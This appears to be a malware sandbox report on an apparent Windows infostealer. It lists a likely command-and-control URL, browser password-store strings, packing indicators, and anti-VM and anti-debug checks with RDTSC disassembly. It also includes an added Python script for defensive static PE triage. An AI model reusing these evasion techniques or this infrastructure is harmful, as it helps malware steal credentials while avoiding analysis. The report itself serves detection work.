Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: zhQFKte2vX.exe, 00000000.00000003.1549254762.00000000011C3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://grannyejh.lat:443/apiV
Source: zhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm
Source: zhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9e
Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: zhQFKte2vX.exe, 00000000.00000003.1634896746.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1634336776.0000000001269000.00000004.00000020.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1668244427.0000000001269000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: zhQFKte2vX.exe, 00000000.00000003.1551457939.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551339414.0000000005B5C000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551269442.0000000005B5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: zhQFKte2vX.exe, 00000000.00000003.1603096089.000000000126C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: zhQFKte2vX.exe, 00000000.00000003.1602552757.0000000005C3B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49706 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49709 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.197.170:443 -> 192.168.2.7:49713 version: TLS 1.2

System Summary

Source: zhQFKte2vX.exe | Static PE information: section name:
Source: zhQFKte2vX.exe | Static PE information: section name: .idata
Source: zhQFKte2vX.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_011DF19F
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_011EABDD
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_011E6B68
Source: zhQFKte2vX.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: zhQFKte2vX.exe | Static PE information: Section: ZLIB complexity 0.9972642872431506
Source: zhQFKte2vX.exe | Static PE information: Section: zajbtexj ZLIB complexity 0.9940281540247679
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@3/1
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: zhQFKte2vX.exe, 00000000.00000003.1578369696.0000000005B46000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1552093109.0000000005B2D000.00000004.00000800.00020000.00000000.sdmp, zhQFKte2vX.exe, 00000000.00000003.1551823930.0000000005B4A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: zhQFKte2vX.exe | ReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | File read: C:\Users\user\Desktop\zhQFKte2vX.exe
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Section loaded: ondemandconnroutehelper.dll
Source: zhQFKte2vX.exe | Static file information: File size 1819648 > 1048576
Source: zhQFKte2vX.exe | Static PE information: Raw size of zajbtexj is bigger than: 0x100000 < 0x193c00

Data Obfuscation

Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Unpacked PE file: 0.2.zhQFKte2vX.exe.4e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;zajbtexj:EW;kwcryctq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;zajbtexj:EW;kwcryctq:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: zhQFKte2vX.exe | Static PE information: real checksum: 0x1c7648 should be: 0x1c5917
Source: zhQFKte2vX.exe | Static PE information: section name:
Source: zhQFKte2vX.exe | Static PE information: section name: .idata
Source: zhQFKte2vX.exe | Static PE information: section name:
Source: zhQFKte2vX.exe | Static PE information: section name: zajbtexj
Source: zhQFKte2vX.exe | Static PE information: section name: kwcryctq
Source: zhQFKte2vX.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0124B928 push eax; ret 0_3_0124B929
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0124B928 push eax; ret 0_3_0124B929
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0124812A pushad ; ret 0_3_0124812D
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0124812A pushad ; ret 0_3_0124812D
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_011DFA20 pushad ; retf 0_3_011DFB15
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0123CF38 push esp; iretd 0_3_0123CF39
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0123CF38 push esp; iretd 0_3_0123CF39
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0123AC4F push eax; iretd 0_3_0123AC56
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0123AC4F push eax; iretd 0_3_0123AC56
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0123CF38 push esp; iretd 0_3_0123CF39
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0123CF38 push esp; iretd 0_3_0123CF39
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0123AC4F push eax; iretd 0_3_0123AC56
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0123AC4F push eax; iretd 0_3_0123AC56
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_011EABDD pushad ; ret 0_3_011EAF11
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_011EA154 push edi; retf 0_3_011EA1DD
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0124B928 push eax; ret 0_3_0124B929
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0124B928 push eax; ret 0_3_0124B929
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0124812A pushad ; ret 0_3_0124812D
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Code function: 0_3_0124812A pushad ; ret 0_3_0124812D
Source: zhQFKte2vX.exe | Static PE information: section name: entropy: 7.97194323302097
Source: zhQFKte2vX.exe | Static PE information: section name: zajbtexj entropy: 7.953476453200085
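The static indicators in the System Summary and Data Obfuscation sections (blank or special-character section names next to random ones such as zajbtexj, ZLIB complexity and entropy close to 8, a raw section larger than 1 MiB, an entry point inside .taggant, a stored checksum that does not match the file) can all be reproduced without the sandbox. The Python below is an added example for this page, not Joe Sandbox code and not the sample: it builds a small constructed PE32 whose section layout imitates the report (names, sizes and bytes are invented for the demonstration), parses the section table, computes Shannon entropy and the zlib ratio per section, finds the section that contains the entry point and recomputes the header checksum with the standard CheckSumMappedFile folding. The thresholds (entropy above 7.0, raw size above 1 MiB) are assumptions chosen to mirror the report's checks.

```python
import collections
import hashlib
import math
import struct
import zlib

SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def _pseudo_random(n):
    """Deterministic high-entropy filler (sha256 chain) standing in for packed payload bytes."""
    out, blk = b"", b"constructed-seed"
    while len(out) < n:
        blk = hashlib.sha256(blk).digest()
        out += blk
    return out[:n]


def build_sample_pe(checksum=0):
    """Constructed PE32 (not the analysed sample) with a report-like layout: a section with an
    empty name, .idata, a random-named packed section and .taggant holding the entry point."""
    sections = [
        (b"", bytes(range(256)) * 4),                    # every byte value 4 times -> entropy 8.0
        (b".idata", b"\0" * 512),                        # all zeros -> entropy 0.0
        (b"zajbtexj", _pseudo_random(4096)),             # packed-looking payload
        (b".taggant", b"\x55\x8b\xec" + b"\x90" * 509),  # prologue + nops; entry point lands here
    ]
    hdr_len = 0x40 + 4 + 20 + 224 + 40 * len(sections)
    first_raw = raw_ptr = (hdr_len + 0x1FF) & ~0x1FF     # sections start on a 512-byte boundary
    rva, sec_hdrs, body = 0x1000, b"", b""
    for name, blob in sections:
        sec_hdrs += struct.pack(SECTION_HDR, name, len(blob), rva, len(blob), raw_ptr,
                                0, 0, 0, 0, 0x60000020)  # CODE | EXECUTE | READ
        body, raw_ptr, rva = body + blob, raw_ptr + len(blob), rva + 0x1000
    entry_rva = 0x1000 * len(sections)                   # first byte of the last section
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x0102)  # i386, EXE | 32BIT
    opt = bytearray(224)                                 # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)           # AddressOfEntryPoint
    struct.pack_into("<I", opt, 64, checksum)            # CheckSum
    hdr = dos + b"PE\0\0" + coff + bytes(opt) + sec_hdrs
    return hdr + b"\0" * (first_raw - len(hdr)) + body


def shannon_entropy(buf):
    """Bits per byte, 0.0 (constant) to 8.0 (uniform); packers typically push this above 7."""
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in collections.Counter(buf).values()) if n else 0.0


def pe_checksum(data, checksum_offset):
    """Header CheckSum as CheckSumMappedFile computes it: fold the file as little-endian dwords
    with end-around carry, skip the CheckSum field itself, then add the file length."""
    total, padded = 0, data + b"\0" * (-len(data) % 4)
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def analyse_pe(data, entropy_threshold=7.0):
    """Static section triage: names, entropy, zlib ratio, raw size, entry-point section, checksum."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[:2] != b"MZ" or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    coff = e_lfanew + 4
    _, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    stored = struct.unpack_from("<I", data, opt + 64)[0]
    real = pe_checksum(data, opt + 64)
    report = {"is_exe": bool(chars & 0x0002), "is_32bit": bool(chars & 0x0100) or magic == 0x10B,
              "checksum_stored": stored, "checksum_real": real, "checksum_ok": stored == real,
              "entry_section": None, "sections": []}
    for i in range(nsec):
        raw_name, vsize, va, rsize, rptr = struct.unpack_from(SECTION_HDR, data, opt + opt_size + 40 * i)[:5]
        name = raw_name.rstrip(b"\0").decode("latin-1")
        blob = data[rptr:rptr + rsize]
        ent, flags = shannon_entropy(blob), []
        if not name or any(c < " " or c > "~" for c in name):
            flags.append("odd_name")        # empty or non-printable name, as in the report
        if ent > entropy_threshold:
            flags.append("high_entropy")    # packed or encrypted content
        if rsize > 0x100000:
            flags.append("raw_over_1mib")
        if va <= entry < va + max(vsize, rsize):
            flags.append("entry_point")
            report["entry_section"] = name
        report["sections"].append({"name": name, "entropy": round(ent, 4), "raw_size": rsize,
                                   "zlib_ratio": round(len(zlib.compress(blob, 9)) / len(blob), 4) if blob else 0.0,
                                   "flags": flags})
    return report


if __name__ == "__main__":
    for sec in analyse_pe(build_sample_pe())["sections"]:
        print(sec)
```

Run against a real file, `analyse_pe(open(path, "rb").read())` gives the same findings the report lists: checksum_ok False is the "real checksum ... should be" line, entry_section is the "section where entry point is pointing to" line, and high_entropy plus odd_name on the same section is the packer signature. A checksum mismatch alone is weak evidence, since many legitimate linkers leave the field zero; it is the combination with the entry point in a non-standard section and near-8 entropy that makes this sample's header worth flagging.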

Boot Survival

Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\zhQFKte2vX.exe | System information queried: FirmwareTableInformation
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A87AD second address: 6A87B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A87B5 second address: 6A87F2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FCD7C4F0D96h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FCD7C4F0DA8h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FCD7C4F0DA5h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 69EDC9 second address: 69EDE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FCD7D2AFB06h 0x0000000a ja 00007FCD7D2AFB06h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jc 00007FCD7D2AFB06h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 69EDE2 second address: 69EDE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 69EDE8 second address: 69EE17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCD7D2AFB15h 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FCD7D2AFB06h 0x0000000f jmp 00007FCD7D2AFB10h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A7912 second address: 6A791A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A7A8F second address: 6A7A97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A7A97 second address: 6A7AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A7AA3 second address: 6A7AA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A7AA7 second address: 6A7AAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A7AAB second address: 6A7AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A7C10 second address: 6A7C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A7C16 second address: 6A7C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A7C1B second address: 6A7C25 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FCD7C4F0D9Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6A7C25 second address: 6A7C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FCD7D2AFB0Dh 0x0000000c pushad 0x0000000d je 00007FCD7D2AFB06h 0x00000013 jmp 00007FCD7D2AFB18h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6AB0FA second address: 6AB100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6AB13A second address: 6AB170 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCD7D2AFB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c jmp 00007FCD7D2AFB10h 0x00000011 nop 0x00000012 mov di, 7CA4h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 jc 00007FCD7D2AFB08h 0x0000001f mov ch, 4Dh 0x00000021 pop edx 0x00000022 push 341F6052h 0x00000027 pushad 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6AB170 second address: 6AB210 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FCD7C4F0DA7h 0x0000000a popad 0x0000000b xor dword ptr [esp], 341F60D2h 0x00000012 call 00007FCD7C4F0DA3h 0x00000017 jmp 00007FCD7C4F0D9Bh 0x0000001c pop edi 0x0000001d push 00000003h 0x0000001f mov di, bx 0x00000022 push 00000000h 0x00000024 mov ecx, dword ptr [ebp+122D308Eh] 0x0000002a push 00000003h 0x0000002c mov ecx, dword ptr [ebp+122D36A8h] 0x00000032 push eax 0x00000033 mov dword ptr [ebp+122D2576h], edx 0x00000039 pop ecx 0x0000003a call 00007FCD7C4F0D99h 0x0000003f jnc 00007FCD7C4F0D9Eh 0x00000045 push eax 0x00000046 jmp 00007FCD7C4F0DA8h 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007FCD7C4F0D9Ah 0x00000056 rdtsc
Source: C:\Users\user\Desktop\zhQFKte2vX.exe | RDTSC instruction interceptor: First address: 6AB301 second address: 6AB306 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
